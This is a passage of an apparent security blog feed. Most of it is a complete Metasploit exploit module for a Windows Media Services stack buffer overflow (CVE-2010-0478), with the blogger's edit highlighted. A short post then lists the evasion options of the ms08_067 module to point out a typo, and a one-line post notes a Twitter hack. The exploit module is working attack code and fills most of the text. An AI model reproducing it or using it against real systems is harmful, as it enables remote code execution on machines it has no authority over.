/># Framework web site for more information on licensing and terms of use.<br /># http://metasploit.com/framework/<br />##<br /><br />class Metasploit3 < Msf::Exploit::Remote<br /> Rank = GreatRanking<br /><br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Exploit::Remote::Seh<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',<br /> 'Description' => %q{<br /> This module exploits a stack buffer overflow in the Windows Media<br /> Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially<br /> crafted FunnelConnect request, an attacker can execute arbitrary code<br /> under the "NetShowServices" user account. Windows Media Services 4.1 ships<br /> with Windows 2000 Server, but is not installed by default.<br /><br /> NOTE: This service does NOT restart automatically. Successful, as well as<br /> unsuccessful exploitation attempts will kill the service which prevents<br /> additional attempts.<br /> },<br /> 'Author' => 'jduck',<br /> 'License' => MSF_LICENSE,<br /> 'Version' => '$Revision: 9101 $',<br /> 'References' =><br /> [<br /> [ 'CVE', '2010-0478' ],<br /> [ 'OSVDB', '63726' ],<br /> [ 'MSB', 'MS10-025' ],<br /> [ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ]<br /> ],<br /> 'DefaultOptions' =><br /> {<br /> 'EXITFUNC' => 'thread',<br /> },<br /> 'Payload' =><br /> {<br /> 'Space' => 600,<br /> 'BadChars' => "\x00\x5c",<br /> 'StackAdjustment' => -3500,<br /> },<br /> 'Platform' => 'win',<br /> 'Targets' =><br /> [<br /> [ 'Windows 2000 Pro SP4 English',<br /> {<br /> # SEH handler offset is 840<br /> # Stack return is at 652<br /> 'Offset' => 840,<br /> 'Ret' => 0x75022ac4 # p/p/r in ws2help.dll<br /> }<br /> ],<br /> ],<br /> 'Privileged' => false,<br /> 'DisclosureDate' => 'Apr 13 2010',<br /> 'DefaultTarget' => 0))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(1755)<br /> ], self.class)<br /> end<br /><br /> def exploit<br /> @pkts = 0<br /> cmd_buf = ''<br /><br /> # LinkViewerToMacConnect<br /> subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}"<br /> #subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net"<br /> #subscriber = "Spooooon!"<br /> subscriber << "\x00"<br /> subscriber = Rex::Text.to_unicode(subscriber)<br /> cmd_buf << make_command(0x30001, subscriber)<br /><br /> # LinkViewerToMacConnectFunnel<br /> #name = Rex::Text.pattern_create(512)<br /> name = ''<br /> name << "\\\\"<br /> name << rand_text((target['Offset'] + 4 + 5) / 2)<br /> name << "\\"<br /> name << "\x00"<br /><br /> # Convert it to Unicode..<br /> name = Rex::Text.to_unicode(name)<br /> <br /> # Insert the return address..<br /> name[4,payload.encoded.length] = payload.encoded<br /><br /> # Build the SEH frame that leads to the payload...<br /> seh = generate_seh_record(target.ret)<br /> asm = "add edi, 0x04\njmp edi"<br /> seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string<br /> name[target['Offset'],seh.length] = seh<br /><br /> <span style="color: rgb(204, 0, 0);">##sumit start</span><br /><span style="color: rgb(204, 0, 0);"> pkt = make_tcpmsghdr(cmd_buf)</span><br /><span style="color: rgb(204, 0, 0);"> connect</span><br /><span style="color: rgb(204, 0, 0);"> sock.put(pkt)</span><br /><span style="color: rgb(204, 0, 0);"> ##sumit done</span><br /><span style="color: rgb(204, 0, 0);"> cmd_buf = ''</span><br /><br /> # Add it to the command buffer..<br /> cmd_buf << make_command(0x30002, name)<br /><br /> # Build the TcpMessageHeader ..<br /> pkt = make_tcpmsghdr(cmd_buf)<br /><br /> print_status("Sending crafy commands (#{pkt.length} bytes) ...")<br /> # Handle the transacation..<br /> #connect<br /> sock.put(pkt)<br /><br /> handler<br /> disconnect<br /> end<br /><br /><br /> #<br /> # Create a TcpMessageHeader from the supplied data<br /> #<br /> def make_tcpmsghdr(data)<br /> len = data.length<br /> # The server doesn't like packets that are bigger...<br /> raise RuntimeError, 'Length too big' if (len > 0x1000)<br /> len /= 8<br /> <br /> # Pack the pieces in ...<br /> pkt = [<br /> 1,0,0,0, # rep, ver, verMinor, pad<br /> 0xb00bface, # session id (nice)<br /> data.length + 16, # msg len<br /> 0x20534d4d, # seal ("MMS ")<br /> len + 2, # chunkCount<br /> @pkts, 0, # seq, MBZ<br /> rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e<br /> ].pack('CCCCVVVVvvVV')<br /><br /> # Add the data<br /> pkt << data<br /><br /> # Pad it to 8 bytes...<br /> left = data.length % 8<br /> pkt << ("\x00" * (8 - left)) if (left > 0)<br /><br /> pkt<br /> end<br /><br /><br /> #<br /> # Create a command packet<br /> #<br /> def make_command(msg_id, extra)<br /> # Two opcodes, get handled differently..<br /> case msg_id<br /> when 0x30001<br /> data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV')<br /><br /> when 0x30002<br /> data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV')<br /><br /> end<br /><br /> # Put some data on...<br /> data << extra<br /><br /> # Pad it to 8 bytes...<br /> left = data.length % 8<br /> data << ("\x00" * (8 - left)) if (left > 0)<br /><br /> # Combine the pieces..<br /> pkt = [<br /> (data.length / 8) + 1, # chunkLen<br /> msg_id # msg ID<br /> ].pack('VV')<br /> pkt << data<br /><br /> pkt<br /> end<br /><br />endSumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-3587782531666618532010-03-27T03:50:00.000-07:002010-03-27T03:53:48.134-07:00What is not Correct with MSFLooks Like there spell check miss this typo ( check TCP::max_send_size Description)<br /><br />msf exploit(ms08_067_netapi) > show evasion<br /><br />Module evasion options:<br /><br /> Name : DCERPC::fake_bind_multi<br /> Current Setting: true<br /> Description : Use multi-context bind calls<br /><br /> Name : DCERPC::fake_bind_multi_append<br /> Current Setting: 0<br /> Description : Set the number of UUIDs to append the target<br /><br /> Name : DCERPC::fake_bind_multi_prepend<br /> Current Setting: 0<br /> Description : Set the number of UUIDs to prepend before the target<br /><br /> Name : DCERPC::max_frag_size<br /> Current Setting: 4096<br /> Description : Set the DCERPC packet fragmentation size<br /><br /> Name : DCERPC::smb_pipeio<br /> Current Setting: rw<br /> Description : Use a different delivery method for accessing named pipes<br /> (accepted: rw, trans)<br /><br /> Name : SMB::obscure_trans_pipe_level<br /> Current Setting: 0<br /> Description : Obscure PIPE string in TransNamedPipe (level 0-3)<br /><br /> Name : SMB::pad_data_level<br /> Current Setting: 0<br /> Description : Place extra padding between headers and data (level 0-3)<br /><br /> Name : SMB::pad_file_level<br /> Current Setting: 0<br /> Description : Obscure path names used in open/create (level 0-3)<br /><br /> Name : SMB::pipe_evasion<br /> Current Setting: False<br /> Description : Enable segmented read/writes for SMB Pipes<br /><br /> Name : SMB::pipe_read_max_size<br /> Current Setting: 1024<br /> Description : Maximum buffer size for pipe reads<br /><br /> Name : SMB::pipe_read_min_size<br /> Current Setting: 1<br /> Description : Minimum buffer size for pipe reads<br /><br /> Name : SMB::pipe_write_max_size<br /> Current Setting: 1024<br /> Description : Maximum buffer size for pipe writes<br /><br /> Name : SMB::pipe_write_min_size<br /> Current Setting: 1<br /> Description : Minimum buffer size for pipe writes<br /><br /> Name : TCP::max_send_size<br /> Current Setting: 0<br /> <span style="color: rgb(255, 0, 0);">Description : Maxiumum tcp segment size. (0 = disable)</span><br /><br /> Name : TCP::send_delay<br /> Current Setting: 0<br /> Description : Delays inserted before every send. (0 = disable)Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0tag:blogger.com,1999:blog-3102368741032358001.post-79547555165806915542009-12-18T01:19:00.000-08:002009-12-18T01:21:33.491-08:00twitter got hacked in the morningVisiting the site shows this message:<br /><span style="text-decoration: underline;"><br /><br /><br /></span><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FSN2VODGAx3GxFlIDfHEorTZI3mB9mHobQkTvnt2MHqFpiWsK-MkqH30urNnkUhbjZFeWyozN9USEa6nqaUjSieJmvOGs9M6STPZFg8GewZklxdGzuGehJSlzz8p5d_bBPyl_SC3Kmw/s1600-h/000011.png"><img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px; height: 242px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8FSN2VODGAx3GxFlIDfHEorTZI3mB9mHobQkTvnt2MHqFpiWsK-MkqH30urNnkUhbjZFeWyozN9USEa6nqaUjSieJmvOGs9M6STPZFg8GewZklxdGzuGehJSlzz8p5d_bBPyl_SC3Kmw/s320/000011.png" alt="" id="BLOGGER_PHOTO_ID_5416503673277316098" border="0" /></a>Sumit Sonihttp://www.blogger.com/profile/00997252131888697683noreply@blogger.com0